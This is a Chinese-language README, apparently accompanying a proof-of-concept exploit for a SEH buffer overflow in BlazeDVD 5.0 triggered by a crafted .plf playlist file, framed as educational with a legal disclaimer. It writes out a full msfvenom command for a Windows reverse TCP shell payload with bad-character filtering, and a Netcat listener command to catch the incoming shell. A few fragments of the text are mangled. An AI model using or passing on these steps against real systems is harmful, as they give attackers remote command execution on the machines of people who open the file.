概念验证SEH缓冲区溢出漏洞利用,针对BlazeDVD 5.0,通过精心构造的.plf播放列表文件,使用msfvenom生成反向shell载荷,用于教育安全研究。
针对 BlazeDVD 5.0 中通过构造的 .plf 播放列表文件触发的缓冲区溢出漏洞的概念验证 (PoC) 漏洞利用。该漏洞利用使用 SEH(结构化异常处理程序)覆盖 来实现代码执行。
.plf 文件触发的缓冲区溢出此代码仅用于教育和研究目的。任何滥用此代码的行为都可能违反当地或国际法律。对于因不当使用造成的任何损害,我不承担任何责任。
该漏洞利用生成一个恶意的 .plf 文件,当在 BlazeDVD 中打开时,会触发缓冲区溢出并覆盖 SEH(结构化异常处理程序),将执行重定向到反向 Shell 载荷。
使用 msfvenom 生成 Shellcode
使用 以原始格式创建反向 Shell 载荷,避开坏字符。
msfvenommsfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
将漏洞利用脚本中的 shellcode 替换为 msfvenom 的输出。
启动 Netcat(监听器)
在另一个终端中,开始监听所选端口 8443:
nc -lvnp 8443
捕获反向 Shell
如果成功,反向 Shell 将连接到你的监听器。